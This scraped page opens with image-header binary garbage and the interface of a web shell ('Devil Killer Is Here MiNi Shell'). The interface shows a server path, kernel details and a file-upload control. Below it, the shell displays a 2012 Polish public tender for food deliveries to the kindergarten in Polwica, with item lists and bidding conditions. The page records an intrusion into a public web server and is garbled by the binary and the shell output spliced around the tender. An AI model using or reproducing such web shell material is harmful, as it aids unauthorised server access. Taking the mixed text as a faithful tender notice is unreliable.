JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120213/43086-N-2012.html

<p class="kh_header"><b>Domaniów: Dostawa artykułów żywnościowych do Przedszkola Publicznego w Polwicy.</b><br>
<b>Numer ogłoszenia: 43086 - 2012; data zamieszczenia: 13.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Publiczne w Polwicy , Polwica 23, 55-216 Domaniów, woj. dolnośląskie, tel. 71 30 19 217, faks 71 30 19 217.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedszkole Publiczne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Przedszkola Publicznego w Polwicy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych wg następujących części:
Część 1 - Pieczywo
Część 2 - Wyroby  ciastkarskie i ciasta 
Część 3 - Jaja
Część 4 - Produkty mleczarskie
Część 5 - Mięso i przetwory mięsne
Część 6 - Warzywa i owoce
Część 7 - Mrożonki i ryby
Część 8 - Różne artykuły spożywcze

Chleb mieszany, krojony, o gramaturze 0,5 kg	szt.	869
Bułka pszenna (wrocławska), krojona, o gramaturze 0,3 kg 	szt.	115
Chałka krojona, o gramaturze 0,5 kg	szt.	51
Chleb słonecznikowy, krojony, o gramaturze 0,35 kg	szt.	20
Chleb żytni, krojony o gramaturze 0,45 kg	szt.	12
Chleb wieloziarnisty, krojony, o gramaturze 0,35 kg	szt.	20
Bułka pszenna mała o gramaturze 0,05 kg	szt.	200
Bułka słodka, drożdżowa,         z nadzieniem z białego sera, budyniu, marmolady lub jabłka wg zamówienia	szt.	500
Bułka maślana czworak            z nadzieniem z białego sera, marmolady, jabłka, budyniu wg zamówienia	szt.	250
Ciasto deserowe wg zamówienia	kg	30
Pączek mały z nadzieniem lub bez nadzienia	kg	50
Ciastka 	kg	20
Jaja kurze kl. M	szt.	3500
Serek o smaku truskawkowym, waniliowym, jabłkowym, o gramaturze 4 x 50g, typu Danonek lub równoważny	op.	240
Deser mleczny, czekoladowy,  o gramaturze 4 x 55g,  typu Monte  lub równoważny	op.	120
Jogurt owocowy o gramaturze 120 g, truskawka, wanilia, typu Danon Gratka lub równoważny	szt.	640
Jogurt owocowy o gramaturze 125g, wanilia, truskawka, morel, typu Zott Serduszko lub równoważny	szt.	480
Jogurt do picia, truskawka, o gramaturze 400g, typu Mlekovita lub równoważny	szt.	250
Kefir naturalny o gramaturze 400g	szt.	150
Miksełko łaciate, kostka o gramaturze 200 g, typu Mlekpol lub równoważne	szt.	830
Masło klarowne o gramaturze 500g, typu Mlekovita lub równoważne	szt.	20
Maślanka owocowa o gramaturze 1 l	szt.	24
Mleko 3,2 %, pasteryzowane, karton o pojemnośli 1l	l	2100
Krem do smarowania pieczywa czekoladowo-orzechowy, o gramaturze 230g, typu Nutella lub równoważny	szt.	48
Twaróg, półtłusty, pakowany próżniowo, typu Rawicz lub równoważny	kg	60
Ser biały śmietankowy, pakowany próżniowo, o gramaturze 250g	kg	50
Ser topiony w plastrach, o gramaturze 150 g, typu Hochland Gouda, Tost, Cheddar lub równoważne	szt.	95
Ser topiony do smarowania Gouda, o gramaturze 150g, typu Mlekovita lub równoważny	szt.	140
Ser żółty typu Gouda lub równoważne	kg	25
Serek homogenizowany o gramaturze 125 - 140g,  waniliowy, truskawkowy, typu Danio lub równoważne	szt.	320
Śmietana 18% o gramaturze 380 - 400g	szt.	600
Twarożek śmietankowy o gramaturze 150g, typu Almette lub równoważny	szt.	80
Łopatka wieprzowa bez kości	kg	380
Pałki z kurczaka	kg	40
Piersi z kurczaka - filet, płaty pojedyńcze lub podwójne, bez przylegającej skóry	kg	130
Porcje rosołowe - porcje rosołowe z szyją	kg	340
Schab wieprzowy bez kości	kg	80
Udka z kurczaka	kg	40
Wątróbka drobiowa	kg	20
Szynka wieprzowa bez kości	kg	70
Wędliny
Kiełbasa typu krakowska sucha, wieprzowa	kg	15
Kiełbasa typu szynkowa, wieprzowa, grubo rozdrobniona	kg	10
Kiełbasa typu żywiecka	kg	10
Kiełbaski drobiowe, o gramaturze 400g, typu Drobimex lub równoważne	szt.	60
Ogonówka	kg	15
Parówki drobiowe, o gramaturze 400g, typu Animex Bobaski lub równoważne	szt.	200
Pasztet drobiowy, typu Prochowicki lub równoważny	szt.	60
Pasztet wieprzowy	szt.	60
Polędwica drobiowa	kg	15
Polędwica typu sopocka	kg	15
Szynka drobiowa	kg	15
Szynka wieprzowa tradycyjna, wędzona	kg	15
Kiełbasa grilowa	kg	40
Kiełbaski frankfurterki	kg	40
Kości wędzone	kg	15
Arbuz	kg	40
Banan	kg	300
Rzodkiew biała	kg	25
Brokuł	kg	40
Brzoskwinie	kg	10
Buraczki czerwone	kg	200
Cebula	kg	45
Cytryna	kg	25
Czosnek	kg	2
Gruszka	kg	30
Jabłko	kg	550
Kapusta biała	kg	135
Kapusta czerwona	kg	45
Kapusta pekińska	kg	55
Kiwi	szt.	670
Koper - nać	szt.	15
Mandarynka	kg	85
Marchew	kg	380
Nektaryna	kg	25
Ogórek zielony	kg	70
Papryka czerwona	kg	20
Pietruszka korzeń	kg	200
Pomarańcza	kg	110
Pomidor	kg	60
Por	kg	50
Rzodkiewka	szt.	120
Sałata	szt.	80
Seler	kg	125
Szczypior pęczek szt. 20
Truskawki	kg	30
Winogrono	kg	20
Ziemniaki	kg	2700
Kalafior	kg	20
Fasola szparagowa kg 20
Kukurydza kolby szt. 200
Cukinia	kg 10
Brukselka kg 10
Śliwka	kg 40
Maliny opakowania o gramaturze 250g	szt.30
Porzeczki czerwone	kg	30
Wiśnie	kg	30
Czereśnie	kg	10
Porzeczki czarne	kg	30
Brokuł mrożony, różyczki, opakowanie 2 kg 	kg	20
Bukiet warzyw (marchew, kalafior, brokuł) pakowane 2 kg	kg	30
Fasola żółta szparagowa, pakowana 2 kg	kg	80
Frytki opakowanie 2,5 kg	kg	30
Kalafior mrożony, różyczki, pakowany 2 kg	kg	80
Marchew mini, pakowane 2 kg	kg	20
Mieszanka jarzynowa 7-składnik. 	kg	15
Zupa jarzynowa, pakowane 2 kg, typ Hortex lub równoważne	kg	70
Ryby
Filet z dorsza	kg	50
Filet z miruny	kg	50
Filet z morszczuka	kg	50
Barszcz biały o gramaturze 66 g, typu Winiary lub równoważny	szt.	160
Barszcz biały - zaprawa o gramaturze 500g	szt.	32
Koncentrat  Barszcz z buraka czerwonego o gramaturze 300ml, typu Krakus lub równoważny	szt.	30
Batonik czekoladowy o gramaturze 23,5g, typu Milky Way lub równoważny	szt.	200
Biszkopty okrągłe o gramaturze 120g	szt.	80
Bita śmietana - spray	szt.	25
Budyń śmietankowy bez cukru	szt.	275
Chrupki kukurydziane o gramaturze 80g	szt.	80
Chrupki kukurydziane o smaku toffi o gramaturze 70g, typu Tygryski lub równoważne	szt.	50
Ciastka delicje o gramaturze 135g, typu Party lub równoważne	szt.	55
Ciastka o gramaturze 30g, typu Petitki Lubisie lub równoważne	szt.	200
Herbatniki wyborowe o gramaturze 140g	szt.	35
Ciastko z cukrem	szt.	30
Cukier  kryształ 1 kg	kg	240
Cukier puder 500g	szt.	10
Cukier waniliowy o gramaturze 30g	szt.	20
Czekoladki o gramaturze 50g, typu Kinder lub równoważne	szt.	100
Dżem niskosłodzony, o smaku truskawka, wiśnia, morela lub brzoskwinia, o gramaturze 300g, typu Łowicz lub równoważny	szt.	35
Galaretka truskawka, cytryna, pomarańcza, agrest	szt.	85
Groszek konserwowy, pojemność 400g	szt.	20
Grzyby suszone  Podgrzybki 20g	szt.	2
Herbatniki szkolne	szt.	65
Kapusta kiszona 1kg	kg	60
Kasza gryczana o gramaturze 4x100g typu Sonko lub równoważna	szt.	60
Kasza jęczmienna wiejska, o gramaturze 4x100g  typu Sonko lub równoważna	szt.	90
Kasza manna błyskawiczna, o gramaturze 400g, typu Kupiec lub równoważna	szt.	25
Ketchup łagodny, o gramaturze 500g, typu Tortex lub równoważny	szt.	70
Kisiel bez cukru, wiśnia, truskawka, cytryna	szt.	100
Kukurydza konserwowa, pojemność 400 g, typu Dawtona lub równoważna	szt.	30
Lizak czekoladowy	szt.	100
Makaron nitki o gramaturze 250 g, typu Czarnecki lub równoważny	szt.	160
Makaron gwiazdki o gramaturze 250g, typu Czarnecki lub równoważny	szt.	15
Makaron łazankowy 250g, Lubella lub podobny	szt.	15
Makaron świderki, o gramaturze 500g, typu Lubella lub równoważny	szt.	40
Makaron wstążki, o gramaturze 500g, typu Lubella lub równoważny	szt.	40
Marmolada wieloowocowa, miękka, o gramaturze  500g	kg	5
Marmolada wieloowocowa, miękka, o gramaturze  1000g	kg	5
Mąka tortowa 1kg, typ 450, Dolnośląska lub równoważna	szt.	220
Mąka ziemniaczana 500g	szt.	15
Mikołaj czekoladowy	szt.	100
Miód wielokwiatowy	szt.	10
Ogórek kwaszony - słoik o gramaturze 710 g typu Luniak lub równoważne	szt.	150
Olej uniwersalny,o gramaturze 1l,  typu ARO lub równoważny	l	200
Oliwa z oliwek z pierwszego tłoczenia	l	10
Paluszki 300 g, solone, Lajkonik Junior lub podobne	szt.	30
Płatki gwiazdki cynamonowe,o gramaturze 250g, typu Mlekołaki lub równoważne	szt.	40
Płatki kólka zbożowe, o gramaturze 250g, typu Mlekołaki lub równoważne	szt.	80
Płatki kukurydziane, o gramaturze 500 g, typu Corn Flakes Nestle lub równoważne	szt.	90
Płatki kulki czekoladowe, o gramaturze 250g, typu Mlekołaki lub równoważne	szt.	80
Płaki muszelki czekoladowe, o gramaturze 250g, typu Mlekołaki lub równoważne	szt.	80
Płatki owsiane błyskawiczne	szt.	10
Posypka dekoracyjna	szt.	5
Przecier pomidorowy 30 % o gramaturze 200 g, typu Pudliszki, Łowicz lub równoważne	szt.	50
Przecier pomidorowy 30 % o gramaturze 400 g, typu Pudliszki, Łowicz lub równoważne	szt.	30
Przecier szczawiowy 200g	szt.	30
Ryż biały długoziarnisty, o gramaturze 4x100g  typu Sonko lub równoważny	szt.	200
Sól warzona, jodowana, drobna, 1 kg	kg	100
Wafle Grześki o gramaturze 39g, typu Jutrzenka lub równoważne	szt.	320
Żurek - zaprawa,o gramaturze 500g	szt.	20
Fasola drobna 500 g	szt.	30
Groch   500 g	szt.	30
Majonez dekoracyjny o gramaturze 400g, typu Winiary lub równoważny	szt.	35
Bułka tarta  500g	szt.	140
Makrela wędzona - tusz e średnie	kg	20
Szprot w pomidorach w puszce	szt.	20
Tunczyk w oleju	szt.	20
Makrela w pomidorach w puszce	szt.	20
Śledzie po wiejsku	kg	20
Herbata czarna, ekspresowa, 200 torebek, typu Saga lub równoważna	szt.	7
Herbata owocowa, ekspresowa, 50 torebek, typu Saga lub równoważna	szt.	40
Kakao rozpuszczalne typu Puchatek lub równoważne	szt.	30
Kawa zbożowa instant  typu Inka Junior lub równoważna	szt.	10
Kawa zbożowa expresowa, 35 torebek, typu Anatol lub równoważna	szt.	10
Napoje
Kompot truskawkowy, wiśniowy, czarna porzeczka, o gramaturze 900 ml, typu Global lub równoważny	szt.	600
Sok nektar owocowy, o gramaturze1,5 l, typu Tymbark lub równoważny	szt.	100
Sok owocowy o pojemności 2l, typu Caprio lub równoważny	szt.	50
Sok owocowy o pojemności 900ml, typu  Pysio, Kubuś lub równoważny	szt.	250
Syrop owocowy o smaku truskawkowym, pomarańczowym, malinowym, wiśniowym, brzoskwiniowym, cytrynowym, pojemność 440 ml, typu Łowicz lub równoważny	szt.	400
Woda niegazowana o pojemności 5l	szt.	10
Przyprawy
Bazylia	szt.	5
Cynamon mielony	szt.	10
Czosnek granulowany	szt.	30
Kminek	szt.	5
Koper suszony o gramaturze 6 g, typu Prymat lub równoważny	szt.	20
Przyprawa Kucharek o gramaturze 1kg, typu Prymat lub równoważna	szt.	20
Kwasek cytrynowy	szt.	30
Liście lauroweo gramaturze 10g	szt.	15
Przyprawa w płynie do zup o gramaturze 1 kg, typu Winiary lub równoważna	szt.	15
Majeranek o gramaturze 10g	szt.	35
Musztarda stołowa, o gramaturze 200g	szt.	10
Oregano	szt.	5
Papryka słodka	szt.	15
Papryka ostra	szt.	5
Pieprz czarny, mielony, naturalny, o gramaturze 20g	szt.	45
Pieprz ziołowy, o gramaturze 20 g	szt.	10
Pietruszka suszona  - natka, o gramaturze 240g, typu Anton lub równoważna	szt.	5
Przyprawa do kurczaka o gramaturze 30g, typu Prymat lub równoważna	szt.	30
Przyprawa do mięsa mielonego typu Prymat lub podobna	szt.	35
Przyprawa do mięsa wieprzowego typu Prymat lub podobna	szt.	35
Przyprawa do ryb typu Prymat lub podobna	szt.	25
Soda oczyszczona	szt.	5
Ziele angielskie, o gramaturze 15g	szt.	25
Zioła prowansalskie	szt.	15.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przywiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust.1 pkt  i 7  ustawy. Zamówienia uzupełniające polegać będą na powtórzeniu asortymentu do wysokości nie wyższej niż 20 % zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.50.00.00-3, 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia na podstawie oświadczenia określonego w pkt. VI.1a</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia na podstawie oświadczenia określonego w pkt. VI.1a</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia na podstawie oświadczenia określonego w pkt. VI.1a</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia na podstawie oświadczenia określonego w pkt. VI.1a</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia na podstawie oświadczenia określonego w pkt. VI.1a</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty
2. Pełnomocnictwo (zgodnie z pkt. VI 3b,c SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug_domaniow.bipgmina.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://ug_domaniow.bipgmina.pl/  lub w Urzędzie Gminy w Domaniowie, Domaniów 56, 55-216 Domaniów pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2012 godzina 10:00, miejsce: Urząd Gminy w Domaniowie, Domaniów 56, 55-216 Domaniów, sekretariat  pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb mieszany, krojony, o gramaturze 0,5 kg	szt.	869
Bułka pszenna (wrocławska), krojona, o gramaturze 0,3 kg 	szt.	115
Chałka krojona, o gramaturze 0,5 kg	szt.	51
Chleb słonecznikowy, krojony, o gramaturze 0,35 kg	szt.	20
Chleb żytni, krojony o gramaturze 0,45 kg	szt.	12
Chleb wieloziarnisty, krojony, o gramaturze 0,35 kg	szt.	20
Bułka pszenna mała o gramaturze 0,05 kg	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyroby ciastkarskie i ciasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka słodka, drożdżowa,         z nadzieniem z białego sera, budyniu, marmolady lub jabłka wg zamówienia	szt.	500
Bułka maślana czworak            z nadzieniem z białego sera, marmolady, jabłka, budyniu wg zamówienia	szt.	250
Ciasto deserowe wg zamówienia	kg	30
Pączek mały z nadzieniem lub bez nadzienia	kg	50
Ciastka 	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze kl. M	szt.	3500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
